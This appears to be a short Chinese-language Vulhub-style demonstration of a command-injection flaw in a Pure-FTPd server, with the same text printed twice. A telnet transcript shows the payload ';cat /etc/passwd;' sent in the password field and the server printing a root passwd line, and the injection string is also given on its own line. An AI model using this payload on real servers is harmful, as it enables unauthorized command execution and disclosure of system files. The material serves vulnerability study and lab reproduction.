VULHUB ™

### 漏洞效果 #### 打印/etc/passwd 演示在存在漏洞主机上注入系统命令打印/etc/passwd： ``` $ telnet 192.168.219.101 21 Trying 192.168.219.101... Connected to 192.168.219.101. Escape character is '^]'. 220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­ 220­ You are user number 1 of 10 allowed. 220 ­Local time is now 22:46. Server port: 21. 220 ­This is a private system ­ No anonymous login 220­ IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. user ' 331 User ' OK. Password required pass ';cat /etc/passwd; root:x:0:0:root:/root:/bin/sh ``` 注入语句： ‘;cat /etc/passwd; 操作截图：  ### 参考链接 [1] https://blogs.securiteam.com/index.php/archives/2694

### 漏洞效果 #### 打印/etc/passwd 演示在存在漏洞主机上注入系统命令打印/etc/passwd： ``` $ telnet 192.168.219.101 21 Trying 192.168.219.101... Connected to 192.168.219.101. Escape character is '^]'. 220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­ 220­ You are user number 1 of 10 allowed. 220 ­Local time is now 22:46. Server port: 21. 220 ­This is a private system ­ No anonymous login 220­ IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. user ' 331 User ' OK. Password required pass ';cat /etc/passwd; root:x:0:0:root:/root:/bin/sh ``` 注入语句： ‘;cat /etc/passwd; 操作截图：  ### 参考链接 [1] https://blogs.securiteam.com/index.php/archives/2694